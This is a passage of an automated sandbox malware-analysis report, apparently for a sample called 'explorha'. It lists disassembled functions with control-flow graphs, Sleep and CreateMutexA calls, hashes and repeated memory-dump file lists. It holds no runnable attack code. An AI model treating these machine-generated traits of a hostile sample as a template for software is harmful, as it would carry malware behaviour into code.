                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 391f28d52f26aa5169fd8d1f9d0a689d252942263a4712b707f943c82da089cc
                                                                                                                                                                                                                                        • Instruction ID: c36481b175e2dff8693820c91f4a270acdbf90f81a22f5d4a5986b5aa7e73d5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 391f28d52f26aa5169fd8d1f9d0a689d252942263a4712b707f943c82da089cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E314671600205DBFB08DB7CCD8979DB6A2AB86314F208318F511D76D6EBBDA9818762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070A01D Relevance: 3.1, APIs: 2, Instructions: 123sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 161 70a01d-70a03d 165 70a06b-70a087 161->165 166 70a03f-70a04b 161->166 167 70a0b5-70a0d4 165->167 168 70a089-70a095 165->168 169 70a061-70a068 call 71ecf8 166->169 170 70a04d-70a05b 166->170 175 70a102-70a3e6 call 719750 167->175 176 70a0d6-70a0e2 167->176 173 70a097-70a0a5 168->173 174 70a0ab-70a0b2 call 71ecf8 168->174 169->165 170->169 171 70a414-70a466 call 7382fa * 3 Sleep CreateMutexA 170->171 173->171 173->174 174->167 181 70a0e4-70a0f2 176->181 182 70a0f8-70a0ff call 71ecf8 176->182 181->171 181->182 182->175
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 59e6f19b4207f456e94c8a6438e5215f511dd8b7871ccc103142c3215879f8b8
                                                                                                                                                                                                                                        • Instruction ID: 82e8a42131c790b948aa02c76459d4e195ab98bc9963502bcae8acf852e08335
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59e6f19b4207f456e94c8a6438e5215f511dd8b7871ccc103142c3215879f8b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80310671700348EBFB08DB6CCD8979DB6B2AB86314F208318E415977D6EB7E59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070A152 Relevance: 3.1, APIs: 2, Instructions: 122sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 196 70a152-70a172 200 70a1a0-70a1bc 196->200 201 70a174-70a180 196->201 202 70a1ea-70a209 200->202 203 70a1be-70a1ca 200->203 204 70a182-70a190 201->204 205 70a196-70a19d call 71ecf8 201->205 208 70a237-70a3e6 call 719750 202->208 209 70a20b-70a217 202->209 206 70a1e0-70a1e7 call 71ecf8 203->206 207 70a1cc-70a1da 203->207 204->205 210 70a419-70a466 call 7382fa * 2 Sleep CreateMutexA 204->210 205->200 206->202 207->206 207->210 215 70a219-70a227 209->215 216 70a22d-70a234 call 71ecf8 209->216 215->210 215->216 216->208
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: e66935452129c1e16862224d156f3e180b5ef95db09bbc94e43e6b3777bcf1ac
                                                                                                                                                                                                                                        • Instruction ID: 766b98359194033f840076424c7d9c12e5826bdb3016bce993ff5d239942645b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e66935452129c1e16862224d156f3e180b5ef95db09bbc94e43e6b3777bcf1ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1310571700344EBFB08DB6CCC997ADB7B2AB86314F208318E415977D6DBBD99808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070958C Relevance: 3.1, APIs: 2, Instructions: 106sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 229 70958c-7095aa 230 7095d8-7095f7 229->230 231 7095ac-7095b8 229->231 232 709625-70a3e6 call 719750 230->232 233 7095f9-709605 230->233 234 7095ba-7095c8 231->234 235 7095ce-7095d5 call 71ecf8 231->235 236 709607-709615 233->236 237 70961b-709622 call 71ecf8 233->237 234->235 239 70a3e7 234->239 235->230 236->237 236->239 237->232 243 70a423-70a466 Sleep CreateMutexA 239->243 244 70a3e7 call 7382fa 239->244 244->243
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: d4509fb148706d320e672f8689d26f3d9030384be7326cfebc7fbd209be32606
                                                                                                                                                                                                                                        • Instruction ID: 1754f6f0eeaa6298865c28f92a1f9db8e630adbb140cc1b9288baedb1bfbcd32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4509fb148706d320e672f8689d26f3d9030384be7326cfebc7fbd209be32606
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40214771604204DBFB18DF68CD887ACFBB2EB81304F208318E9159B7D2DBBE59808751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070A326 Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 271 70a326-70a33e 272 70a340-70a34c 271->272 273 70a36c-70a36e 271->273 276 70a362-70a369 call 71ecf8 272->276 277 70a34e-70a35c 272->277 274 70a370-70a377 273->274 275 70a379-70a381 call 7078b0 273->275 278 70a3bb-70a3e6 call 719750 274->278 287 70a383-70a38b call 7078b0 275->287 288 70a3b4-70a3b6 275->288 276->273 277->276 280 70a41e-70a458 call 7382fa Sleep CreateMutexA 277->280 292 70a45e-70a466 280->292 287->288 293 70a38d-70a395 call 7078b0 287->293 288->278 293->288 297 70a397-70a39f call 7078b0 293->297 297->288 300 70a3a1-70a3a9 call 7078b0 297->300 300->288 303 70a3ab-70a3b2 300->303 303->278
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
